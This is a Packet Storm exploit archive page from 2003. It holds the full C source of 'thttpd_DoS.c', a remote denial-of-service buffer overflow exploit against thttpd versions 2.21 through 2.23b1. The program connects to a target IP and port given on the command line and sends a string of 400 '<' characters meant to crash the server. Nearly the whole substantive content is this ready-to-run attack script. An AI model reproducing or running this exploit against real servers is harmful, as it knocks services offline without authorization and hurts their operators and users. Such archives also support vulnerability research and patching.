exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

thttpd_DoS.c

thttpd_DoS.c
Posted Dec 15, 2003
Authored by Phender

Thttpd v2.21 through 2.23b1 remote denial of service buffer overflow exploit.

tags | exploit, remote, denial of service, overflow
SHA-256 | dc4ab59e4569091147040021c6785d26637756f5863cd9d183215b3d2809884d

thttpd_DoS.c

Change Mirror Download
/*  THTTPd versions 2.21 through 2.23b1 DoS by phender     */
/* This code will send a string to segfault the server */

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>

main(int argc, char *argv[])
{
struct hostent *hent;
struct sockaddr_in sock;
int sockfd, port = 80, i = 0;
char buf[500];
if(argc < 2 || argc > 3){
printf("THTTPd (v2.21 - v2.23b1) DoS by phender\n");
printf("Usage: %s <target ip> [port]\n", argv[0]);
exit(1);
}
if(argc == 3)
port = atoi(argv[2]);
while(i < 400){
buf[i++] = '<';
}
buf[i] = 0;
strcat(buf, " hi\n\n");
bzero(&sock, sizeof(sock));
sock.sin_addr.s_addr = inet_addr(argv[1]);
sock.sin_port = htons(port);
sockfd = socket(AF_INET,SOCK_STREAM,0);
sock.sin_family = AF_INET;
if((connect(sockfd, (struct sockaddr *)&sock, sizeof(sock))) == -1){
perror("connect");
exit(1);
}
write(sockfd, buf, strlen(buf));
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close